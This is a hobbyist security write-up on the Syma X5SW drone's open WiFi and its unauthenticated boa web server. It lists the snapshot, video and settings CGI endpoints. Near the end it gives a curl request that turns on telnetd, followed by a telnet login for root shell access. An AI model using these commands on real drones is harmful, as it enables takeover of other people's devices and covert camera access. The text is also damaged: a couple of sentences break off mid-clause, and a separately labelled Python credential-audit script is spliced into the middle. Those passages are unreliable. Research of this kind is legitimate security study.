Cheap drones such as the Syma X5SW aren’t really designed with security in mind. Anyone can connect to the open WiFi access point that the drone broadcasts and issue requests to the drone’s web server for things like video streaming, setting options, and more.
This drone in particular runs a DHCP server and assigns addresses starting at `192.168.1.100`, and the drone has the static IP `192.168.1.1`. On port 80, it’s running a `boa 0.94.14rc21` web server. It has a statically configured `admin` user, with a blank password. For authenticating requests, the user supplies `pwd=` GET parameters.
As a starting point, I downloaded the APK for the Android version of the FPV app. After unzipping the APK, we found the first endpoint for capturing images by running the following command on the app’s dex file:

```
strings com.tomdxs.symafpv/classes.dex | grep cgi
```

This yielded a single result: `2http://192.168.1.1:80/snapshot.cgi?user=admin&pwd=`, clearly the streaming endpoint we were looking for. Googling this led to much better Google results, and gave me access to previous research done on these [and similarly architected] drones, and manufacturers that produce similar cameras:
- http://gw.tnode.com/drone/micro-drone-3-0-camera-api/ Winner!
  - `GET /videostream.cgi`: streaming video
  - `GET /snapshot.cgi`: take a picture
  - `GET /get_params.cgi`: get all camera options
  - `GET /set_params.cgi`: set all camera options, including activation of
We can obtain video in most modern web browsers by GET requesting the
We can obtain still images by making a GET request here: `http://192.168.1.1/snapshot.cgi?user=admin&pwd=`

The images it outputs are relatively low quality. One of the samples we obtained had a size of 640x480, and was 0.307 megapixels.
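The `strings ... | grep cgi` step above, generalized into a small audit of an app's extracted strings for URLs that carry credentials in the query string (an added example, not code from the original post or from the app). Apart from the `snapshot.cgi` line found in the post, the sample input is constructed, and the parameter-name lists are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of `strings classes.dex` output. Only the snapshot.cgi
# line comes from the post; the other lines are made up for this example.
SAMPLE_STRINGS = """\
2http://192.168.1.1:80/snapshot.cgi?user=admin&pwd=
Landroid/widget/TextView;
https://example.com/help?lang=en
4http://10.0.0.5/login.cgi?user=root&password=hunter2
"""

# Searching (not anchoring) skips the length byte dex puts before each string,
# which `strings` prints as a stray leading character such as "2".
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Assumed parameter names; extend them for the app under review.
USER_KEYS = {"user", "username", "login"}
PASS_KEYS = {"pwd", "pass", "password"}


def find_embedded_credentials(strings_output):
    """Return one finding per URL that carries credentials in its query."""
    findings = []
    for match in URL_RE.finditer(strings_output):
        url = match.group(0)
        parts = urlsplit(url)
        # keep_blank_values=True matters: by default parse_qs drops `pwd=`,
        # which would hide exactly the blank-password case.
        query = parse_qs(parts.query, keep_blank_values=True)
        users = [v for k in query if k.lower() in USER_KEYS for v in query[k]]
        pwds = [v for k in query if k.lower() in PASS_KEYS for v in query[k]]
        if not users and not pwds:
            continue
        findings.append({
            "url": url,
            "host": parts.hostname,
            "path": parts.path,
            "user": users[0] if users else None,
            "blank_password": bool(pwds) and all(p == "" for p in pwds),
            "cleartext_http": parts.scheme == "http",
        })
    return findings


if __name__ == "__main__":
    for finding in find_embedded_credentials(SAMPLE_STRINGS):
        print(finding)
```
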
```bash
# To obtain a shell on the device, we run the following `GET` request:
$ curl 'http://192.168.1.1/set_params.cgi?telnetd=1&save=1&reboot=1&user=admin&pwd='
# Once it reboots, we telnet into the box with the `admin` user:
$ telnet -l admin 192.168.1.1
# If all goes successfully, after a few seconds you'll have a shell!
# BusyBox v1.15.2 (2015-07-01 14:40:28 CST) hush - the humble shell
```
Unfortunately, unlike the microdrone mentioned in one of the other articles I read, it appears you cannot control the drone via the web interface. The serial ports that it mentions don’t exist.
Things to do
- There are binaries for powering off the drone, shutting down, etc. Do they work while in-flight?
- Search for CGI scripts to possibly find other vulnerabilities
2018-05-31 - Initial Revision